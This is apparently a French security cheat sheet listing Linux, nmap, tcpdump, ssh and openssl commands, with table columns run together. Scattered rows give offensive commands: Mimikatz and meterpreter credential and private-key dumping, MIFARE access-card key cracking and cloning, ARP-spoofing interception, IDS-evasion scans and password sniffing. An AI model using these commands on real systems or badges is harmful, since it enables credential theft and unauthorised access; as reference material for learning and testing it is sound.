OKSECU+

OKSECU+

MCH 2023

Les Commandes LINUX utiles

Exemple SoftCatégoriesinformations
nslookupnslookupLinux OSPermet d'interroger un serveur de noms afin d'obtenir les informations concernant un domaine ou un hôte et permet ainsi de diagnostiquer les éventuels problèmes de configuration du DNS
2 = write (w)chmodgestion des permissionsLe 1er chiffre est l'autorisation du propriétaire, le 2ème au groupe et le 3ème à tout le monde
$HOMELinux standardLinux OSAnnuaire personnel
$PATHLinux standardLinux OSChemin de recherche exécutable
$SHELLLinux standardLinux OSshell actuelle
(tcpdump option) -etcpdumpcapture de paquetsEn-têtes Print Link (Ethernet) (option d'affichage)
(tcpdump option) -qtcpdumpcapture de paquetsLe mode assez et moins verbeux affiche moins de détails (option d'affichage)
(tcpdump option) -Stcpdumpcapture de paquetsImprimer les numéros de séquence au format exact (option d'affichage)
(tcpdump option) -ttcpdumpcapture de paquetsNe pas imprimer les détails de l'horodatage dans le vidage (option d'affichage)
(tcpdump option) -vtcpdumpcapture de paquetsPeu de sortie verbeuse (option d'affichage)
(tcpdump option) -xtcpdumpcapture de paquetsImprimer les données et les en-têtes au format HEX (option d'affichage)
(tcpdump option) -Xtcpdumpcapture de paquetsSortie d'impression au format HEX et ASCII à l' exclusion des en -têtes de lien (option d'affichage)
(tcpdump option) -xxtcpdumpcapture de paquetsImprimer des données avec des en-têtes de lien au format HEX (option d'affichage)
(tcpdump option) -XXtcpdumpcapture de paquetsSortie d'impression au format HEX et ASCII, y compris les en -têtes de lien (option d'affichage)
(tcpdump option) -vvtcpdumpcapture de paquetsSortie plus verbeuse (option d'affichage)
(tcpdump option) -vvvtcpdumpcapture de paquetsSortie la plus verbeuse (option d'affichage)
1 = execute (x)chmodgestion des permissionsLe 1er chiffre est l'autorisation du propriétaire, le 2ème au groupe et le 3ème à tout le monde
4 = read (r) chmodgestion des permissionsLe 1er chiffre est l'autorisation du propriétaire, le 2ème au groupe et le 3ème à tout le monde
cat file1 file2catgestion dossiers et fichiersConcaténer les fichiers et la sortie
cd dossier02cdgestion dossiers et fichiersChanger de répertoire vers dossier02
cd..cdgestion dossiers et fichiersRemonter l'arborescence
chmod 775 filechmodgestion des permissionsChanger le mode du fichier en 775
chmod -R 600 folderchmodgestion des permissionsDossier chmod récursivement à 600
chown user:group filechmodgestion des permissionsChanger le propriétaire du fichier en utilisateur et le groupe en groupe
cmd &Linux standardExécution de cmdExécutez cmd dans un sous-shell
cmd &> fileLinux standardRedirection E/SChaque sortie de cmd dans un fichier
cmd < fileLinux standardRedirection E/SEntrée de cmd à partir du fichier
cmd > /dev/nullLinux standardRedirection E/SSupprimer la sortie standard de cmd
cmd > fileLinux standardRedirection E/SSortie standard (stdout) de cmd dans un fichier
cmd >> fileLinux standardRedirection E/SAjouter stdout au fichier
cmd 1>&2Linux standardRedirection E/Sstdout au même endroit que stderr
cmd 2> fileLinux standardRedirection E/SSortie d'erreur (stderr) de cmd dans le fichier
cmd 2>&1Linux standardRedirection E/Sstderr au même endroit que stdout
cmd1 | cmd2Linux standardRedirection E/Sstdout de cmd1 à cmd2 avec la pipe
cmd1 && cmd2Linux standardExécution de cmdExécutez cmd2 si cmd1 réussit
cmd1 ; cmd2Linux standardExécution de cmdExécutez cmd1 puis cmd2
cmd1 |& cmd2Linux standardRedirection E/Sstderr de cmd1 à cmd2 avec la pipe
cmd1 || cmd2Linux standardExécution de cmdExécutez cmd2 si cmd1 ne réussit pas
cmd1 <(cmd2)Linux standardRedirection E/SSortie de cmd2 en tant qu'entrée de fichier dans cmd1
copié-collé le contenu de la clé publiquesshGénérer une paire de clé RSAEtape B4 (méthode 1) - Puis on colle dans le fichier "authorized_keys" le contenu de notre clé publique précédemment copié depuis ~/.ssh/id_rsa.pub qui était sur la machine cliente.
cp file1 file2cpgestion dossiers et fichiersCopier le fichier1 dans le fichier2
cryptoMimikatzExploitation vulnérabilitésinteragit avec les modules cryptographiques de Windows CryptoAPI [CAPI]et CNG [CNG], ainsi que l’extraction de certificats et de clés.
crypto::exportCertificates < MagasinSystème> MimikatzExploitation vulnérabilitésEtape E - Enfin, il nous suffit d'exécuter la commande suivante pour récupérer le certificat et la clé privée associée
crypto::listCertificates MimikatzExploitation vulnérabilitésEtape B - lister les certificats disponibles
crypto::listStores MimikatzExploitation vulnérabilitésEtape A - La première étape consiste à rechercher, dans les magasins de la machine, l’endroit où est stocké le certificat. Dans notre cas, le certificat étant associé à un utilisateur, nous listons les magasins de l'utilisateur courant (CERT_SYSTEM_STORE_CURRENT_USER) via la commande suivante
crypto::patchcapiMimikatzExploitation vulnérabilitésEtape C - Afin d'exporter la clé privée du certificat mathieu.mauger, nous patchons le mécanisme de sécurité CryptoAPI à l'aide de la fonction patchapi
crypto::patchcngMimikatzExploitation vulnérabilitésEtape D - Si la clé avait été protégée par la CNG, nous aurions dû patcher LSASS avant d’exporter via
ctrl-Onano gestion dossiers et fichiersnano - Enregistrer le fichier
ctrl-Rnano gestion dossiers et fichiersnano - Lire le fichier
ctrl-Xnano gestion dossiers et fichiersnano - fermer le fichier
dateLinux standardLinux OSAfficher la date du système
divers MimikatzExploitation vulnérabilitéscontient diverses fonctions majoritairement expérimentales.
echo $NAMELinux standardLinux OSValeur de sortie de la variable $ NAME
envLinux standardLinux OSAfficher les variables d'environnement
ether src/ dst host (ethernet host name or IP)tcpdumpcapture de paquetsFiltrage d'hôte Ethernet par source ou destination
ether/ip broadcasttcpdumpcapture de paquetsFiltre pour les diffusions Ethernet ou IP
ether/ip multicasttcpdumpcapture de paquetsFiltre pour les multidiffusions Ethernet ou IP
export NAME=valueLinux standardLinux OSDéfinir $ NAME sur la valeur
file file1Linux standardgestion dossiers et fichiersObtenir le type de fichier1
find /root/ -name photo*findgestion dossiers et fichiersTrouver les fichiers commençant par photo
find /root/ -user totofindgestion dossiers et fichiersTrouver les fichiers détenus par utilisateur toto
find /root/ -mmin 10findgestion dossiers et fichiersTrouver les fichiers modifier il y'a moins de 10  minutes 
grep " open " results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | lessnmapCommande spécialeListe triée inversée de la fréquence à laquelle les ports apparaissent
grep -igrepgestion dossiers et fichiersRecherche insensible à la casse
grep -ogrepgestion dossiers et fichiersAfficher uniquement la partie correspondante du fichier
grep -rgrepgestion dossiers et fichiersRecherche récursive
grep toto fichier01.txtgrepgestion dossiers et fichiersRechercher "toto" dans les fichier01.txt
grep -vgrepgestion dossiers et fichiersRecherche inversée
head -n1 /etc/issueLinux standardLinux OSAfficher la distribution
head file1headgestion dossiers et fichiersAfficher les 10 premières lignes du fichier1
inject MimikatzExploitation vulnérabilitésinjection de bibliothèques dans des processus Windows.
kelloworld (bibliothèque)MimikatzExploitation vulnérabilitésest une bibliothèque servant d’exemple pour l’injection
kill pidkillGestion des processusTuer le processus avec id pid
killall namekillGestion des processusTuez tous les processus avec des noms commençant par le nom indiquer
klock (bibliothèque)MimikatzExploitation vulnérabilitéspermet la manipulation de bureaux.
L' UID c'est quoi ?informations nfcNFC /RfidUID - Identifiant unique d'une puce nfc (ex: ea b5 8f 4b)
La cle privée c'est quoi?sshGénérer une paire de clé RSAune clé dite « privée » qui sert à déchiffrer. (id_rsa)
La clé publique c'est quoi?sshGénérer une paire de clé RSAune clé dite « publique » qui sert à chiffrer (id_rsa.pub)
Le block 0 c'est quoi ?informations nfcNFC /RfidLe "block 0" c'est là qu'est écrit le numéro de série de la puce (UID)
Les clés A et B c'est quoi ? informations nfcNFC /RfidCe sont les 2 clés qui protèges les block secteur de la puce NFC
less file1lessgestion dossiers et fichiersAfficher et paginer le fichier1
locate filelocategestion dossiers et fichiersRechercher un fichier (recherche rapide de l'index système)
lslsgestion dossiers et fichierslister des dossiers et fichiers
ls -alsgestion dossiers et fichiersTout afficher (y compris masqué)
ls -Ilsgestion dossiers et fichiersFormat de liste longue
ls -llsgestion dossiers et fichiersLister un fichier par ligne
ls -mlsgestion dossiers et fichiersSortie séparée par des virgules
ls -Qlsgestion dossiers et fichiersSortie citée
ls -Rlsgestion dossiers et fichiersListe récursive
ls -rlsgestion dossiers et fichiersLister par Ordre inverse
ls -Slsgestion dossiers et fichiersTrier par taille de fichier
ls -tlsgestion dossiers et fichiersTrier par taille de fichier
macchanger -m 23:05:13:37:42:21 eth0macchangerUsurpation d'adresse MACChanger l'adresses MAC de mon interface eth0
man nom_du_softLinux standardLinux OSAfficher le manuel de la commande
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a é"sekurlsa::logonPasswords full" exite'Mimikatz + meterpreterCommande spéciale * H : crée un processus caché.
* i : interagit avec le processus une fois ce dernier créé.
* c : déporte la sortie standard de l’exécutable sur le shell meterpreter.
* d : indique le nom du processus à utiliser et qui apparaîtra ainsi dans le gestionnaire des tâches.
* m : exécute le programme depuis la mémoire.
* f : signale l’exécutable.
* a : signale les arguments. Il est à noter l'utilisation de guillemets pour les arguments de Mimikatz.B23
mfcuk -C -R 0:AmfcukNFC /RfidExtraction de la clé A sur le block 0 ( -C = initialise la connection au lecteur)
mfoc -P 500 -O carte-acces.dmpmfocNFC /RfidCréation dump de la puce carte d'accès (originale)
mfoc -O mifare_dump.mfd -k xxxxxxxxxxxxmfocNFC /Rfidutiliser la clef trouvé (xxxxxx ) pour retrouver toutes les autres clefs
mfoc -P 500 -O puce-originale.dmpmfocNFC /RfidEtape A - Extraction des infos + block0 (uid) + clés défaut (a+b) de puce original
mfoc -P 500 -O puce-vierge.dmpmfocNFC /RfidEtape B - Extraction des infos + block0 (uid) + clés défaut (a+b) de puce original
mimikatz.sys (pilote)MimikatzExploitation vulnérabilitésEnfin, un pilote mimikatz.sys est également fourni et permet ainsi d’avoir un point d’entrée en mode utilisateur dans le noyau
minesweeper MimikatzExploitation vulnérabilitésmodule de démonstration permettant de manipuler le démineur de Windows XP et 7.
mkdir .sshsshGénérer une paire de clé RSAEtape B2 (méthode 1) - Puis créer s’il n’existe pas, le répertoire .ssh à la racine du répertoire utilisateur du serveur distant
mkdir dossier01mkdirgestion dossiers et fichiersCréer un répertoire dossier01
mountLinux standardLinux OSAfficher les systèmes de fichiers montés
mv file1 file2mvgestion dossiers et fichiersDéplacer le fichier1 vers le fichier2
nano /.ssh/authorized_keyssshGénérer une paire de clé RSAEtape B3 (méthode 1) - Puis créer s’il n’existe pas, le fichier "authorized_keys", ou seront copiés les clés publiques autorisées à se connecter.
nano fichier.txtnano gestion dossiers et fichiersnano - crée le fichier.txt
ncat 192.168.1.10 1337ncatOutils de connectionConnection à l'hote 192.168.1.10 sur le port TCP 1337
ncat -l -p 1337ncatOutils de connectionÉcouter sur le port TCP 1337
ncat --ssl 10.5.23.42 1337ncatCertificats TLS - SSLConnectez-vous au service TLS
ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pemncatCertificats TLS - SSLDémarrez le serveur TLS
ndiff scanl.xml scan2.xmlnmapCommande spécialeComparez la sortie de nmap en utilisant le ndif
nfc-list nfc-listNFC /RfidLecture simple d'une puce nfc
nfc-list -vnfc-listNFC /RfidLecture avancée d'une puce nfc
nfc-mfclassic r a u carte-original-avec-clés-a-b-par-défaut.binnfc-mfclassicNFC /RfidDumper le contenu de la carte vers le fichier ,bin en utilisant des clefs a et b par défaut
nfc-mfclassic W a carte-acces.dmp carte-vierge.dmpnfc-mfclassicNFC /RfidEcriture avec (block 0) de carte-accès.dmp sur une carte vierge
nfc-mfclassic W a puce-originale.dmp puce-vierge.dmpnfc-mfclassicNFC /RfidEtape C - Copie avec block0 de puce-originale vers puce-vierge
nfc-scan-devicenfc-scanNFC /RfidLister les lecteurs disponibles
nmap 192.168.1.0/24nmapScanner de reseauxNumériser en utilisant la notation CIDR
nmap 192.168.1.1nmapScanner de reseauxScanner une seule IP
nmap 192.168.1.1 192.168.2.1nmapScanner de reseauxAnalyser des adresses IP spécifiques
nmap 192.168.1.1 -AnmapDetection OSPermet la détection du système d'exploitation, la détection de version,l'analyse de script et le traceroute
nmap 192.168.1.1 -dnmapSortie des résultats d'analysesAugmentez le niveau de débogage (utilisez -dd ou plus pour un meilleur effet)
nmap 192.168.1.1 -FnmapScan d'hoteAnalyse rapide des ports (100 ports)
nmap 192.168.1.1 -fnmapUsurpation de pare-feu / IDSL'analyse demandée (y compris les analyses ping) utilise de minuscules paquets IP fragmentés. Plus difficile pour les filtres de paquets
nmap 192.168.1.1 --mtu 32nmapUsurpation de pare-feu / IDSDéfinissez votre propre taille de MTU
nmap 192.168.1.1 -nnmapScan d'hoteNe jamais faire de résolution DNS pendant le scan
nmap 192.168.1.1 -OnmapDetection OSDétection du système d'exploitation à distance à l'aide de l'empreinte de la pile TCP / IP
nmap 192.168.1.1 -oA resultsnmapSortie des résultats d'analysesSortie dans les trois principaux formats à la fois
nmap 192.168.1.1 -oG grep.filenmapSortie des résultats d'analysesSortie "Grepable" dans le fichier grep.file
nmap 192.168.1.1 -oN normal.filenmapSortie des résultats d'analysesSortie normale dans le fichier normal.file
nmap 192.168.1.1 --opennmapSortie des résultats d'analysesAfficher uniquement les ports ouverts (ou éventuellement ouverts)
nmap 192.168.1.1 -oX xml.filenmapSortie des résultats d'analysesSortie XML dans le fichier xml.file
nmap 192.168.1.1 -p 21nmapScan d'hoteScan un seul port
nmap 192.168.1.1 -p 21-100nmapScan d'hoteScan une plage de ports
nmap 192.168.1.1 -p http,httpsnmapScan d'hoteAnalyse des ports à partir du nom du service
nmap 192.168.1.1 -p U: 53, T: 21-25,80nmapScan d'hoteAnalyse des ports spécifiques en TCP et UDP
nmap 192.168.1.1 -p0-nmapScan d'hoteBalayage de tous les ports
nmap 192.168.1.1 --reasonnmapSortie des résultats d'analysesAfficher la raison pour laquelle un port est dans un état particulier, même sortie que -vv
nmap 192.168.1.1 -sAnmapTechnique de scan Analyse du port TCP ACK
nmap 192.168.1.1 -sCnmapScripts NSEAnalyser avec les scripts NSE par défaut. Considéré comme utile pour la découverte et sûr
nmap 192.168.1.1 --script "not intrusive"nmapScripts NSEAnalyser les paramètres par défaut, mais supprimer les scripts intrusifs
nmap 192.168.1.1 --script defaultnmapScripts NSEAnalyser avec les scripts NSE par défaut. Considéré comme utile pour la découverte et sûr
nmap 192.168.1.1 --script=bannernmapScripts NSENumérisez avec un seul script. Exemple de bannière
nmap 192.168.1.1 --script=http*nmapScripts NSENumérisez avec un caractère générique. Exemple http
nmap 192.168.1.1 --script=http,bannernmapScripts NSEScannez avec deux scripts. Exemple http et bannière
nmap 192.168.1.1 -sMnmapTechnique de scan Analyse des ports TCP Maimon
nmap 192.168.1.1 -sSnmapTechnique de scan Analyse des ports TCP SYN (par défaut)
nmap 192.168.1.1 -sTnmapTechnique de scan Analyse du port de connexion TCP
nmap 192.168.1.1 -sUnmapTechnique de scan Analyse des ports UDP
nmap 192.168.1.1 -sVnmapDetection des services et versions Tente de déterminer la version du service en cours d'exécution sur le port
nmap 192.168.1.1 -sV --version-intensity 8nmapDetection des services et versions Niveau d'intensité 0 à 9. Attention ! Un nombre plus élevé augmente les faux positifs.
nmap 192.168.1.1 -sWnmapTechnique de scan Analyse des ports de la fenêtre TCP
nmap 192.168.1.1 -T0nmapVitesse de scan Paranoid (0) (analyse lente) Détection d' intrusion évasion système
nmap 192.168.1.1 -T1nmapVitesse de scan Sneaky (1) Système de détection d' intrusion évasion
nmap 192.168.1.1 -T2nmapVitesse de scan Polite (2) ralentit l'analyse pour utiliser moins de bande passante et utiliser moins de ressources de la machine cible
nmap 192.168.1.1 -T3nmapVitesse de scan Normal (3) qui est la vitesse par défaut
nmap 192.168.1.1 -T4nmapVitesse de scan Les balayages agressifs (4) accélèrent; suppose que vous êtes sur un réseau raisonnablement rapide et fiable
nmap 192.168.1.1 -T4 --packet-tracenmapSortie des résultats d'analysesAfficher tous les paquets envoyés et reçus
nmap 192.168.1.1 -T5nmapVitesse de scan Balayage de vitesses folles (5); suppose que vous êtes sur un réseau extrêmement rapide
nmap 192.168.1.1 -vnmapSortie des résultats d'analysesAugmentez le niveau de verbosité (utilisez -vv ou plus pour un meilleur effet)
nmap 192.168.1.1/24 -snnmapScan d'hoteDésactivez l'analyse des ports. Découverte d'hôte uniquement.
nmap 192.168.1.1-1/24 -PR -sn -vvnmapCommande spécialeDécouverte Arp uniquement sur le réseau local, pas de scan de port
nmap 192.168.1.1-254nmapScanner de reseauxScanner une plage d'IP
nmap 192.168.1.1-3 -sLnmapScan d'hotePas de scan. Lister les cibles uniquement
nmap 192.168.1.1-5 -PnnmapScan d'hoteDésactivez la découverte d'hôte. Analyse des ports uniquement.
nmap 192.168.1.1-50 -sL --dns-server 192.168.1.1nmapCommande spécialeInterrogez le DNS interne pour les hôtes, répertoriez uniquement les cibles
nmap -6 2607: f0d0: 1002: 51 :: 4nmapScanner de reseauxScanner adresse IPv6
nmap -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1nmapUsurpation de pare-feu / IDSEnvoyer des scans à partir d'adresses IP usurpées
nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ipnmapUsurpation de pare-feu / IDSEnvoyer des scans à partir d'adresses de leurre (a choisir)
nmap --data-length 200 192.168.1.1nmapUsurpation de pare-feu / IDSAjoute des données aléatoires aux paquets envoyés
nmap --exclude 192.168.1.1nmapScanner de reseauxExclure les hôtes répertoriés
nmap -f -t 0 -n -Pn - longueur des données 200 -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1nmapUsurpation de pare-feu / IDSExemple de commande IDS Evasion
nmap -g 53 192.168.1.1nmapUsurpation de pare-feu / IDSUtiliser le numéro de port source donné
nmap -hnmapScanner de reseauxécran d'aide nmap
nmap --iflistnmapSortie des résultats d'analysesAffiche les interfaces et les itinéraires de l'hôte
nmap -iL targets.txtnmapScanner de reseauxAnalyser les cibles à partir d'un fichier
nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txtnmapCommande spécialeGénérer une liste des adresses IP des hôtes en direct
nmap -iR 10 -sn -traceroutenmapCommande spécialeTraceroute vers des cibles aléatoires, pas de scan de port
nmap -iR 100nmapScanner de reseauxAnalyser 100 hôtes aléatoires
nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000nmapScripts NSERecherche rapide de serveurs Web aléatoires
nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1nmapScripts NSESafe SMB scripts to run
nmap -p80 --script http-sql-injection scanme.nmap.orgnmapScripts NSERechercher des injections SQL
nmap -p80 --script http-unsafe-output-escaping scanme.nmap.orgnmapScripts NSEDétecter les vulnérabilités des scripts intersites
nmap -p80 -sV -oG - --open 192.168.1.1/24 | grep opennmapCommande spécialeRechercher les serveurs Web et grep pour afficher les adresses IP exécutant des serveurs Web
nmap -Pn --script = http-sitemap-generator scanme.nmap.orgnmapScripts NSEgénérateur de plan de site http
nmap -Pn --script=dns-brute domain.comnmapScripts NSEBrute force les noms d'hôtes DNS à deviner les sous-domaines
nmap --proxies http://192.168.1.1:8080, http://192.168.1.2:8080 192.168.1.1nmapUsurpation de pare-feu / IDSConnexions relais via des proxys HTTP / SOCKS4
nmap --resume results.filenmapSortie des résultats d'analysesReprendre une analyse
nmap -S www.microsoft.com www.facebook.comnmapUsurpation de pare-feu / IDSScanner Facebook à partir de Microsoft (-e eth0 -Pn peut être requis)
nmap scanme.nmap.orgnmapScanner de reseauxAnalyser un domaine
nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1nmapScripts NSEScript NSE avec arguments
nmap --script whois* domain.comnmapScripts NSERequête Whois
nogpo MimikatzExploitation vulnérabilitéspermet de contourner certaines GPO Windows triviales.
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.org/"opensslCertificats TLS - SSLCréer un certificat auto-signé
openssl s_client -connect 10.5.23.42:1337opensslCertificats TLS - SSLConnectez-vous au service TLS en utilisant openssl
openssl s_client -connect 10.5.23.42:1337 | openssl x509 -textopensslCertificats TLS - SSLAfficher les détails du certificat
pkill namekillGestion des processusTuer le processus avec le nom du processus
privilege::debugMimikatzExploitation vulnérabilités il est nécessaire de nous attribuer le privilège Debug si nous ne sommes pas déjà SYSTEM
pspsGestion des processusAfficher un instantané des processus
pwdLinux standardgestion dossiers et fichiersAfficher le répertoire actuel
rm file1rmgestion dossiers et fichiersSupprimer le fichier1
rsync option (-a )rsyncSynchonisation des donnéesmode archivage, permet de copier de manière récursive, de préserver les permissions et de ne pas suivre les liens symboliques
rsync option (--dry-run)rsyncSynchonisation des donnéeseffectuer un essai sans modification
rsync option (-e ssh )rsyncSynchonisation des donnéespermet d’utiliser ssh pour le transfert de données
rsync option (-v )rsyncSynchonisation des donnéesverbose, affiche la liste des fichiers copiés
rsync option (-z )rsyncSynchonisation des donnéescompress, permet de compresser les données avant de les transférer
rsync -ave ssh serveur_ip_ou_nom:/chemin/vers/source /chemin/vers/destinationrsync + sshSynchonisation des donnéesSynchoniser source et destination d'un serveur à l'autre (méthode 2)
rsync chemin/vers/source chemin/vers/destinationrsyncSynchonisation des donnéesSynchoniser source et destination depuis la même machine
rsync -e ssh -avz /chemin/vers/source serveur_ip_ou_nom:/chemin/vers/destinationrsync + sshSynchonisation des donnéesSynchoniser source et destination d'un serveur à l'autre (méthode 1)
samdump MimikatzExploitation vulnérabilitéspermet d’extraire les hashes de la base SAM de l’équipement Windows, via la base de registre ou des fichiers plats.
sekurlsa MimikatzExploitation vulnérabilitésextrait les hashes et mots de passe des sessions Windows en cours.
sekurlsa (bibliothèque)MimikatzExploitation vulnérabilitésfournit les mêmes fonctionnalités que le module éponyme. Il est préconisé de privilégier l’utilisation du module.Elle ne contient maintenant que les fonctionnalités devant s'exécuter dans le processus LSASS (processus gérant l'authentification des utilisateurs de l'équipement).
sekurlsa::logonPasswords fullMimikatzExploitation vulnérabilitésA voir
socat TCP-LISTEN:2305,fork,reuseaddr ssl:example.com:443opensslCertificats TLS - SSLProxy TCP vers TLS
sqlmap -u "site:www.site-exemple.com inurl:produit.php"SqlmapInjection SQL Recherche d'erreurs SQL sur le "www.site-exemple.com" via le dorks "produit.php"
src/ dsthost (host name or IP)tcpdumpcapture de paquetsFiltrer par adresse IP ou hôte source ou de destination
src/ dstnet (subnet mask in CIDR)tcpdumpcapture de paquetsFiltrer par sous-réseau
ssh user@mon_serveursshGénérer une paire de clé RSAEtape B1 (méthode 1) - se connecter manuellement en ssh sur le serveur distant
ssh-add sshGénérer une paire de clé RSAEtape C - "L'agent ssh" retient les clés privées pendant toute la durée de votre session.Maintenant, a chaque fois que vous vous connecterez à ce serveur distant, vous n'aurez plus besoin d'entrer la passphrase
ssh-copy-id -i id_rsa.pub user@ip-serveur-distantsshGénérer une paire de clé RSAEtape B5 (méthode 2) - Envoyer la clé publique "id_rsa.pub" au serveur distant et à l'ajouter à son fichier "authorized_keys(clés autorisées)". Le serveur y garde une liste des clés qu'il autorise à se connecter.
ssh-keygen -p -t rsasshGénérer une paire de clé RSAEtape E - Si vous souhaitez par la suite modifier le mot de passe de la clé, il faudra utiliser cette commande
ssh-keygen -t rsasshGénérer une paire de clé RSAEtape A1 - créer une clé publique et clé privée sur sa machine cliente ( L’emplacement par défaut ou seront générés les clés /home/votre_user/.ssh/id_rsa )
ssh-keygen -t rsasshGénérer une paire de clé RSAEtape A2 - Indiquer le "nom du fichier de clé" /home/toto/.ssh/ id_rsa_rsync et le "pass" vide pour connexion auto de rsync
sslyze --regular 10.5.23.42:443opensslCertificats TLS - SSLTester le certificat et les chiffrements du serveur TLS
standardMimikatzExploitation vulnérabilitésintègre les commandes de base de l'outil
sudo /etc/init.d/ssh restartsshGénérer une paire de clé RSAEtape D - Lors du simple ajout de clé, il est nécessaire de redémarrer le server openssh afin qu’il prenne en compte le nouveau client
system MimikatzExploitation vulnérabilitésintègre des commandes système de base telles que l’obtention de l’utilisateur et de l’ordinateur courant.
tail -F file1tailgestion dossiers et fichiersSortie des dernières lignes du fichier1 à mesure qu'il change
tail file1tailgestion dossiers et fichiersAfficher les 10 dernières lignes du fichier1
tcp/udp src/dst port ( port number)tcpdumpcapture de paquetsFiltrer les paquets TCP ou UDP par port source ou de destination
tcp/udp src/dst port range ( port number range)tcpdumpcapture de paquetsFiltrer les paquets TCP ou UDP par plage de ports source ou de destination
tcpdump <32tcpdumpcapture de paquetsAffiche la taille des paquets inférieure à 32
tcpdump >=32tcpdumpcapture de paquetsAffiche la taille des paquets supérieure à 32
tcpdump -d tcpdump.pcaptcpdumpcapture de paquetsafficher une forme lisible par l'homme dans la sortie standard
tcpdump dst 10.1.1.1 && !icmptcpdumpcapture de paquetsL'une ou l'autre des conditions peut correspondre
tcpdump dst 10.1.1.1 and not icmptcpdumpcapture de paquetsNégation de la condition
tcpdump dst 10.1.1.100tcpdumpcapture de paquetsCapturer à partir d'une adresse de destination spécifique
tcpdump ether host aa: bb: cc: 11: 22: 33tcpdumpcapture de paquets"host" pour limiter la sortie à une adresse MAC spécifique
tcpdump ether port 80tcpdumpcapture de paquetsCapturer le trafic à partir d'un port défini uniquement
tcpdump -F tcpdump.pcaptcpdumpcapture de paquetsUtilisez le fichier donné comme entrée pour le filtre
tcpdump host 192.168.1.100tcpdumpcapture de paquetsCapturer des paquets d'un hôte spécifique
tcpdump httptcpdumpcapture de paquetsFiltrer le trafic en fonction d'un numéro de port pour un service
tcpdump -i anytcpdumpcapture de paquetsCapture depuis toutes les interfaces
tcpdump -i eth0tcpdumpcapture de paquetsCapture depuis une interface spécifique
tcpdump -I eth0tcpdumpcapture de paquetsdéfinir l'interface comme mode moniteur
tcpdump -i eth0 -c 10tcpdumpcapture de paquetsCapturez les 10 premiers paquets et quittez
tcpdump -i eth0 -w tcpdump.txttcpdumpcapture de paquetsPour enregistrer la capture dans un fichier
tcpdump -K tcpdump.pcaptcpdumpcapture de paquetsNe pas vérifier la somme de contrôle
tcpdump -Ltcpdumpcapture de paquetsAfficher les types de liaison de données pour l'interface
tcpdump -n -I eth0tcpdumpcapture de paquetsNe résolvez pas les noms d'hôte
tcpdump -N tcpdump.pcaptcpdumpcapture de paquetsne pas imprimer les noms de domaine
tcpdump -n src 192.168.1.1 and dst port 21tcpdumpcapture de paquetsCombiner les options de filtrage
tcpdump net 10.1.1.0/16tcpdumpcapture de paquetsCapturer des fichiers à partir du sous-réseau du réseau
tcpdump -p -i eth0tcpdumpcapture de paquetsNe pas capturer en mode promiscuité
tcpdump port 80tcpdumpcapture de paquetsFiltrer le trafic en fonction d'un service
tcpdump portrange 21-125tcpdumpcapture de paquetsFiltre basé sur la plage de ports
tcpdump -r file_path_and_nametcpdumpcapture de paquetsLecture d'une capture
tcpdump -S httptcpdumpcapture de paquetsAfficher le paquet entier
tcpdump src 10.1.1.100tcpdumpcapture de paquetsCapturer à partir d'une adresse source spécifique
tcpdump -Dtcpdumpcapture de paquetsAfficher les interfaces disponibles
tcpdump -i eth0 -Atcpdumpcapture de paquetsImprimer en ASCII
tcpdump -i eth0 -c 10 -w tcpdump.pcap tcptcpdumpcapture de paquetsCapturer uniquement les paquets TCP
tcpdump -i eth0 port 80tcpdumpcapture de paquetsCapturer le trafic à partir d'un port défini uniquement
tcpdump -n -i eth0tcpdumpcapture de paquetsArrêter la traduction et les recherches de noms de domaine (noms d'hôte ou noms de port)
tcpdump -r tcpdump.txttcpdumpcapture de paquetsLire et analyser le fichier de capture enregistré
tcpdunp -IPV6tcpdumpcapture de paquetsAfficher uniquement les paquets IPV6
Tester le certificat TLS sur les sites "ssllabs.com" et "hardenize.com"opensslCertificats TLS - SSLTester le certificat TLS en ligne
topkillGestion des processusAfficher les processus en temps réel
touch file1.txttouchgestion dossiers et fichiersCréer un fichier1.txt avec touch
ts MimikatzExploitation vulnérabilitésmanipulation des sessions Terminal Server (autorise le dépassement du nombre maximal de connexions simultanées notamment).
uname -aLinux standardLinux OSAfficher le système et le noyau
uptimeLinux standardLinux OSAfficher la disponibilité
watch -n 5 'ntpq -p'watchVoir exécuter une cmd tout les 5sÉmettez la commande 'ntpq -p' toutes les 5 secondes et affichez la sortie
whereis commandwhereisgestion dossiers et fichiersTrouver binaire / source / manuel pour la "commande"
whoamiLinux standardLinux OSMontrez votre nom d'utilisateur
winmine MimikatzExploitation vulnérabilitésmodule de démonstration permettant de manipuler le démineur de Windows XP et 7.
xsltproc nmap.xml -o nmap.htmlnmapCommande spécialeConvertir les fichiers xml nmap en fichiers html
arpspoof -i wlan0 192.168.1.20 192.168.1.1arpspoof - suite dsniffMITM - Man In The Middlearpspoof -i interface ip_cible ip_du_routeur
mitmf --arp --spoof --gateway 192.168.1.1 --target 192.168.1.20 -i wlan0mitmfMITM - Man In The MiddleEmpoisonnement de la table ARP de l'hote 192.168.1.20 via l'interface wlan0
mitmf --arp --spoof --gateway 192.168.1.1 -i wlan0mitmfMITM - Man In The MiddleEmpoisonnement de la table ARP de tous les hosts du LAN via l'interface wlan0
arp -a arpspoof - suite dsniffMITM - Man In The MiddleAfficher ma table ARP
ip neighip neighMITM - Man In The MiddleAfficher mon cache ARP
ip neigh flush allip neighMITM - Man In The MiddleSupprimer mon cache ARP
ssh root@192.168.1.20 tcpdump -U -s0 -w - 'not port 22' | wireshark -k -i -ssh + tcpdump + wiresharkCapture de paquets à distanceAnalyser le trafic à distance via SSH avec Wireshark (spécifiez "l'option -U" pour empêcher la mise en mémoire tampon et "-i any" pour voir toutes les interfaces
ngrep -i passwordngrepAnalyse de paquets Rechercher le mot "password" dans le trafic réseau:
urlsnarfurlsnarfAnalyse de paquets Afficher les requêtes HTTP GET
